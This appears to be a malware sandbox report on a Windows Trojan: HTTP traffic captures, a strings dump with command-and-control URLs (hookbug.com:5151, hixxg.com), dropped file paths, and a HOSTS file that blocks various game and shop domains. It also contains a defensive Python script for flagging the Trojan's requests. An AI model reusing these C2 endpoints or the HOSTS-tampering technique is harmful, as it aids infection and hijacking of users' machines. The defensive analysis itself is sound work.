User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
Cook
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:30 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
Set-Cookie: SUV=007111CEB86B262653B9B25EE700A038; expires=Wed, 03-Jul-24 20:32:30 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
GET /pv.gif?uigs_productid=webapp&type=tmon&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&loc=CA&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&eg=1&cost=116&idc=cnc&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&h_s=1404660985943&h_e=1404660986568&b_e=1404660988755&a_e=1404660990302&w_l=1404660990333 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=CA; SUID=26266BB86914920A0000000053B9B257; SUV=007111CEB86B262653B9B25EE700A038
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:30 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
GET /pa?p=2:1848168177:41 &r=0.6772223338484764 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.hookbug.com:5151/qq.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wpa.qq.com
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: tws
Date: Sun, 06 Jul 2014 20:32:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Location: hXXp://pub.idqqimg.com/qconn/wpa/button/button_10.gif
Pragma: no-cache
Cache-Control: no-cache; must-revalidate
GET /net/a/04/link?&url=http://VVV.pvc123.com/skin/pvc/image/company.jpg&appid=100520072&referer=hXXp://VVV.pvc123.com/b-p765576731/ HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img02.store.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=CA; SUID=26266BB86914920A0000000053B9B257
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:29 GMT
Content-Type: image/jpeg
Content-Length: 4669
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 355492bcc18e8674a0bc7cd191018b4e
Expires: Tue, 05 Aug 2014 15:39:13 GMT
Cache-Control: max-age=2592000
Last-Modified: Sun, 06 Jul 2014 15:39:13 GMT
[binary JPEG body (JFIF, comment "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95") not reproduced]<<< skipped >>>
GET /images/btn_del.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:27 GMT
Content-Type: image/gif
Content-Length: 1286
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:22:42 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:27 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1aec2-506"
Expires: Tue, 05 Aug 2014 20:32:27 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
[binary GIF89a body with embedded Adobe XMP metadata (CreatorTool: Adobe Photoshop CS6 (Windows)) not reproduced]<<< skipped >>>
GET /images/ico_src.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:27 GMT
Content-Type: image/png
Content-Length: 8524
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:22:42 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:27 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1aec2-214c"
Expires: Tue, 05 Aug 2014 20:32:27 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
[binary PNG body with embedded ICC profile (iCCP chunk "Photoshop ICC profile") not reproduced]<<< skipped >>>
GET /js/jquery-1.6.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:28 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:23:35 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:28 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Tue, 05 Aug 2014 20:32:28 GMT
Cache-Control: max-age=2592000
Content-Encoding: gzip
[gzip-compressed chunked JavaScript body not reproduced]<<< skipped >>>
GET /js/pb_v.min.1.9.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:29 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:23:35 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:29 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Tue, 05 Aug 2014 20:32:29 GMT
Cache-Control: max-age=2592000
Content-Encoding: gzip
[gzip-compressed chunked JavaScript body not reproduced]<<< skipped >>>
GET /soso/images/icon_index.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:24 GMT
Content-Type: image/png
Content-Length: 3310
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:19:23 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:23 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1adfb-cee"
Expires: Tue, 05 Aug 2014 20:32:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
[binary PNG body not reproduced]<<< skipped >>>
GET /q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.soso.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29; expires=Wed, 16-Jul-14 20:32:25 GMT; path=/
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:25 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
set-cookie: ld=NwFoPlllll2FmbJBlllllVni7O6lllllmp7uJkllll9lllllxoER$5@@@@@@@@@@; path=/; expires=Tue, 05 Aug 2014 20:32:25 GMT; domain=.sogou.com
Cache-Control: max-age=0
Expires: Sun, 06 Jul 2014 20:32:25 GMT
Content-Encoding: gzip
[gzip-compressed chunked HTML body not reproduced]<<< skipped >>>
GET /images/logo/new/soso.png?nv=1&v=2 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:28 GMT
Content-Type: image/png
Content-Length: 3404
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:21:30 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:27 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1ae7a-d4c"
Expires: Tue, 05 Aug 2014 20:32:27 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
[binary PNG body with tEXt Software "Adobe ImageReady" and embedded Adobe XMP metadata (CreatorTool: Adobe Photoshop CC (Windows)) not reproduced]<<< skipped >>>
GET /images/ico_icp.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:29 GMT
Content-Type: image/gif
Content-Length: 1139
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:22:42 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:29 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1aec2-473"
Expires: Tue, 05 Aug 2014 20:32:29 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
[binary GIF89a body with embedded Adobe XMP metadata (CreatorTool: Adobe Photoshop CS6 (Windows)) not reproduced]<<< skipped >>>
GET /js/sugg_ajaj.v.5.2.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:30 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:23:35 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:30 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Tue, 05 Aug 2014 20:32:30 GMT
Cache-Control: max-age=2592000
Content-Encoding: gzip
[gzip-compressed chunked JavaScript body not reproduced]<<< skipped >>>
GET /30d/img/web/logo130826.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: soso.qstatic.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Wed, 30 Jul 2014 16:38:02 GMT
Date: Mon, 30 Jun 2014 16:38:02 GMT
Content-Type: image/png
ETag: "52594142"
Accept-Ranges: bytes
Last-Modified: Mon, 26 Aug 2013 08:32:00 GMT
Cache-Control: max-age=2592000
Content-Length: 2443
Server: WS CDN Server
Age: 1
X-Via: 1.1 zjjhdx33:80 (Cdn Cache Server V2.0), 1.1 lasi18:7 (Cdn Cache Server V2.0)
Connection: keep-alive
[binary PNG body not reproduced]<<< skipped >>>
GET /wpa/images/group.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.hookbug.com:5151/qunb.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pub.idqqimg.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: NWS_UGC_HY
Connection: keep-alive
Date: Sun, 06 Jul 2014 20:32:23 GMT
Cache-Control: max-age=2592000
Expires: Tue, 05 Aug 2014 20:32:23 GMT
Last-Modified: Fri, 12 Apr 2013 09:22:21 GMT
Content-Type: image/png
Content-Length: 1827
X-Cache-Lookup: Hit From Disktank
[binary PNG body not reproduced]<<< skipped >>>
GET /websearch/features/year.jsp HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:23 GMT
Content-Type: application/x-javascript; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: ABTEST=0|1404678743|v17; expires=Tue, 05-Aug-14 20:32:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:23 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUID=26266BB86914920A0000000053B9B257; expires=Sat, 01-Jul-34 20:32:23 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sun, 06 Jul 2014 20:32:23 GMT
Cache-Control: max-age=0
Content-Encoding: gzip
[gzip-compressed chunked response body omitted; the capture then repeats the same 200 OK response (identical headers, Date, Set-Cookie values and body) once more]<<< skipped >>>
GET /img/fav.ico?6be69b4a-b962-42eb-8324-0d6d8e367010 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.sogou.com
Connection: Keep-Alive
Cookie: ABTEST=0|1404678743|v17; IPLOC=CA; SUID=26266BB86914920A0000000053B9B257
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:29 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
[GIF89a image body, 43 bytes, omitted]
GET /net/a/04/link?&url=http://p4.yokacdn.com/pic/cr/2011/0909/10256772.jpg&appid=100520072&referer=hXXp://VVV.yokamen.cn/auto/news/2013/0604089097.shtml HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.store.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=CA; SUID=26266BB86914920A0000000053B9B257
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:27 GMT
Content-Type: image/jpeg
Content-Length: 8289
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: be34d07853b29896e8638bc2e7118225
Expires: Sun, 27 Jul 2014 15:24:44 GMT
Cache-Control: max-age=2592000
Last-Modified: Fri, 27 Jun 2014 15:24:44 GMT
[JPEG image body omitted: JFIF, comment "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95"; 8289 bytes declared, capture truncated]<<< skipped >>>
GET /s/blog_b61e00f001016mtd.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: blog.sina.com.cn
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.2.8
Date: Sun, 06 Jul 2014 20:32:23 GMT
Content-Type: text/html
Content-Length: 26137
Connection: keep-alive
Vary: Accept-Encoding
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Expires: Sun, 06 Jul 2014 20:32:22 GMT
Last-Modified: Sun, 06 Jul 2014 09:58:09 GMT 8
DPOOL_HEADER: 10.55.27.25
SINA-LB: aGwuOTAuc2c1LmphLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS: ZThmOWU0Y2UgMCAwIDAgOSAyMTkK
Age: 66855
X-Cache: HIT from blog-front006.blog.ja.sinanode.com
X-debug: 218.30.115.254
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="hXXp://VVV.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>[non-ASCII title, not preserved in the dump]</title>
<meta name="keywords" content="[non-ASCII keywords, not preserved in the dump],it" />
<meta name="description" content="[non-ASCII description, not preserved in the dump]," />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<meta http-equiv="mobile-agent" content="format=html5; url=hXXp://blog.sina.cn/dpool/blog/s/blog_b61e00f001016mtd.html?vt=4">
<meta http-equiv="mobile-agent" content="format=wml; url=hXXp://blog.sina.cn/dpool/blog/ArtRead.php?nid=b61e00f001016mtd&vt=1">
<!--[if lte IE 6]>
<script type="text/javascript">
try{
document.execCommand("BackgroundImageCache", false, true);
}catch(e){}
</script>
<![endif]-->
<script type="text/javascript">
window.staticTime=new Date().getTime();
</script>
<link rel="pingback" href="hXXp://upload.move.blog.sina.com.cn/blog_rebuild/blog/xmlrpc.php" />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="hXXp://upload.move.blog.sina.com.cn/blog_rebuild/blog/xmlrpc.php?rsd" />
<link href="http://blog.sina.com.cn/blog_rebuild/blog/wlwmanifest.xml" type="application/wlwmanifest+xml" rel="wlwmanifest" />
<link rel="alternate"<<< skipped >>>
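The capture above mixes two kinds of requests. The sogou/soso fetches carry the full Internet Explorer header set (Accept-Language, Accept-Encoding, and the long MSIE 6.0 / Windows NT 5.1 User-Agent with .NET CLR tokens), which is what the sample's embedded browser control sends. The blog.sina.com.cn fetch sends only Accept, Host and Cache-Control: no-cache with the bare User-Agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)", and that exact string also appears in the sample's strings dump further down, as does the URL http://blog.sina.com.cn/s/blog_b61e00f001016mtd.html. The Python below is an added example, not part of the Lavasoft report or of the sample, that splits a dump in this layout into requests and flags those that look Trojan-originated: the hardcoded User-Agent, a Host taken from the URLs in the strings dump (www.hookbug.com, www.hixxg.com, bbs.52jwxx.com), and the no-cache / no-Accept-Language header set. The input is a constructed three-request dump modelled on the capture; the third request, to www.hookbug.com:5151/qunb.html, is an assumption (the cache listing contains qunb[1].htm, but the capture shown does not include a request for it).

```python
"""Flag requests in a sandbox HTTP dump that were issued by the sample itself
rather than by the embedded browser control (added example, not from the report)."""
import re
from typing import Dict, List, Tuple

# User-Agent that appears verbatim in the sample's strings dump.
HARDCODED_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

# Hostnames of the URLs embedded in the sample's strings dump.
C2_HOSTS = {"www.hookbug.com", "www.hixxg.com", "bbs.52jwxx.com"}

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]$")

# Constructed input in the layout of the capture: a request line, its headers,
# then the response (status line, headers, body) with no blank lines between
# them. The first two requests are copied from the capture; the third (qunb.html
# on the hookbug.com host) is assumed, since the cache listing holds qunb[1].htm
# but the capture shown does not include the request for it.
SAMPLE_DUMP = """\
GET /websearch/features/year.jsp HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-javascript; charset=gbk
GET /s/blog_b61e00f001016mtd.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: blog.sina.com.cn
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.2.8
Content-Type: text/html
GET /qunb.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: www.hookbug.com:5151
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html
"""


def parse_requests(dump: str) -> List[Dict[str, str]]:
    """Split the dump into requests. A request's headers run until the next
    request line or a status line; response headers and bodies are skipped."""
    requests: List[Dict[str, str]] = []
    current = None
    for raw in dump.splitlines():
        line = raw.strip()
        match = REQUEST_LINE.match(line)
        if match:
            current = {"method": match.group(1), "path": match.group(2)}
            requests.append(current)
            continue
        if line.startswith("HTTP/1."):
            current = None  # a response follows; ignore it until the next request
            continue
        if current is None:
            continue
        name, sep, value = line.partition(":")
        if sep and name and " " not in name.strip():
            current[name.strip().lower()] = value.strip()
    return requests


def classify(req: Dict[str, str]) -> List[str]:
    """Return the reasons a request looks Trojan-originated (empty if none)."""
    reasons = []
    host = req.get("host", "").split(":")[0].lower()
    if req.get("user-agent") == HARDCODED_UA:
        reasons.append("hardcoded-ua")
    if host in C2_HOSTS:
        reasons.append("known-c2-host")
    # Requests made through IE carry Accept-Language; the sample's own client
    # does not, and it forces no-cache so it always receives a fresh page.
    if req.get("cache-control", "").lower() == "no-cache" and "accept-language" not in req:
        reasons.append("non-browser-header-set")
    return reasons


def suspicious_requests(dump: str) -> List[Tuple[str, str, List[str]]]:
    """(host, path, reasons) for every flagged request, in capture order."""
    flagged = []
    for req in parse_requests(dump):
        reasons = classify(req)
        if reasons:
            flagged.append((req.get("host", ""), req["path"], reasons))
    return flagged


if __name__ == "__main__":
    for host, path, reasons in suspicious_requests(SAMPLE_DUMP):
        print(f"{host}{path}  <- {', '.join(reasons)}")
```

Run it against a proxy log or sandbox dump in the same layout. The header-set heuristic on its own is weak (any command-line downloader trips it), so treat it as corroboration for the User-Agent and host matches rather than as a signal by itself.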
The Trojan connects to the servers at the following location(s):
.text
.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
kernel32.dll
Kernel32.dll
ntdll.dll
user32.dll
Shlwapi.dll
shlwapi.dll
NTDLL.DLL
psapi.dll
advapi32.dll
wsock32.dll
Ws2_32.dll
ws2_32.dll
ole32.dll
atl.dll
OLEACC.DLL
gdiplus.dll
gdi32.dll
MsgWaitForMultipleObjects
CreateWindowStationA
CloseWindowStation
ExitWindowsEx
SetWindowsHookExA
EnumWindows
CreateIoCompletionPort
GdiplusShutdown
RegCreateKeyA
RegOpenKeyA
RegEnumKeyA
RegCloseKey
RegFlushKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
www.hixxg.com
http://www.hookbug.com:5151/vip
http://www.hixxg.com
www.hixxg.com
Result=MsgBox ("(*^__^*)
%System%\XXTS.vbs
\UpData.exe
\unrar.dll
BASEURL
Hotkey
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 52jwyy.com
127.0.0.1 www.52jwyy.com
127.0.0.1 bbs.52jwyy.com
127.0.0.1 au2014.com
127.0.0.1 www.au2014.com
127.0.0.1 92ausf.com
127.0.0.1 www.92ausf.com
127.0.0.1 92jwyy.taobao.com
127.0.0.1 shop105942574.taobao.com
127.0.0.1 jwyywg.d131.tqxq.com
127.0.0.1 www.jwyywg.d131.tqxq.com
127.0.0.1 audition0538.i.sohu.com
127.0.0.1 www.vdisk.cn/au2012fuzhu
127.0.0.1 audition0538.blog.sohu.com
127.0.0.1 9421mm.com
127.0.0.1 www.9421mm.com
